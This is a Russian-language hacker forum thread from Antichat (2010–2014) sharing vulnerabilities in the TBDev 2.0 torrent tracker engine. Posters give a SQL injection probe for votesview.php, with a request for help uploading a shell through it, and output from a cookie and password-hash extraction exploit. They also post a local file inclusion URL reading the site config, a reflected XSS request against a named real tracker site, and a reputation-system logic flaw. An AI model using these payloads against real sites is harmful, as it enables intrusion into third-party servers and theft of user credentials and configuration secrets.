ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Трекер-движок TBDev 2.0 (https://forum.antichat.xyz/showthread.php?t=79705)

SoftLive 20.02.2010 14:45

votesview.php?requestid=-99'

:)

А вообще помогите через неё шелл залить/прочитать файл...

votesview.php есть в YSE немного старее чем с СВН, да и в tbsource дефульт есть

xoren 21.02.2010 02:35

Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE]
Trying to get salt: 11111111111111111111 [DONE]

Я не понял чо passhash 0000000.... и salt 111111111... где проблема ?

HAXTA4OK 21.02.2010 08:14

Цитата:

Сообщение от xoren
Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE]
Trying to get salt: 11111111111111111111 [DONE]

Я не понял чо passhash 0000000.... и salt 111111111... где проблема ?

не правильный id/ пропатченная версия двига

xoren 21.02.2010 22:05

HAXTA4OK, понятно... :S

OxoTnik 21.10.2012 19:42

Восстанавливаем забытую тему =)

Уязвимость скрипта: modal_mailbox.php (чат)

Тип: Локальный Инклуд

Уязвимый параметр: ?action

Exploit:http://examle.com/modal_mailbox.php?action=../include/config

Внимание, возможно потребуется регистрация на сайте.

Автор: OxoTnik

YaBtr 25.04.2014 14:21

Небольшой UP

passive XSS (reflected)

Уязвимый сценарий: redirector.php

Exploit:

Цитата:

Сообщение от None
GET /redirector.php?url=%253cscript%253ealert%25281%252 9%253c%25 HTTP/1.1
Host: bit-torrent.kiev.ua
....


Yuna 11.06.2014 10:31

Бу, ну как - новых уязвимостей не появилось?

А-то руки чешутся git push сделать с багфиксами =)

А пока поделюсь:

Как известно, в движке, на данный момент, есть система репутации (Респекты).

Так вот, даже если юзер отключил приём личных сообщений, то:

1. Ему вс1равно будут идти сообщения от системы репутации

2. Система не делает валидацию того за то получает человек респект (т.е можно получить/дать респект/антиреспект за торрент который ты не заливал/которого вообще не сущесвтует )

Пример:

simpaty.php?action=add&good&targetid=1&type=torren t1

Меняем type=torrent1 на torrent12345 и респект всёравно проходит.

Не совсем уязвимость, скорее алгоритмическая недоработка

Грабитель 13.06.2014 04:26

Отличное отношение к багам. Типичный "разработчик".

HAXTA4OK 13.06.2014 17:19

to yuna движок был интересен в свое время, сейчас аналогов много , а делать гит с багфиксами, смысл, если двиг не обновляется

Yuna 17.06.2014 17:22

HAXTA4OK, а что в твоем понимании "обновляется"?


Время: 10:31